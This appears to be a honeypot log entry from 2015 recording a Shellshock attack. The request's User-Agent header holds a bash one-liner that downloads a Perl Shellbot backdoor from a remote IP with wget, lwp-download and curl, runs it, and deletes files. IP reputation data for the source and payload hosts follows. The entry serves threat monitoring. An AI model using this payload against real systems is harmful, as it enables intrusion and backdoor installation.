BEGIN OF HTTP DATA:
2015-10-07 05:42:05
Source IP: 62.210.157.90
Country: FR RiskScore: 1 Malware: []
GET /hello HTTP/1.0
Host: 109.234.106.8
User-Agent: () { :;}; /bin/bash -c "cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*"
When I try to download the malware, ZoneAlarm reports a
Backdoor.Perl.Shellbot.s
62.210.157[.]90
Static Source: GeoIP data
- Country: France
- ASN: AS12876 ONLINE S.A.S.
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/62.210.157.90
Static Source: http://sendmespamids.blogspot.nl/ Blacklist
- Comment: Listed on Honeypot blacklist
- Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
23.229.121[.]186
Static Source: GeoIP data
- Country: United States
- ASN: AS36352 ColoCrossing
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/23.229.121.186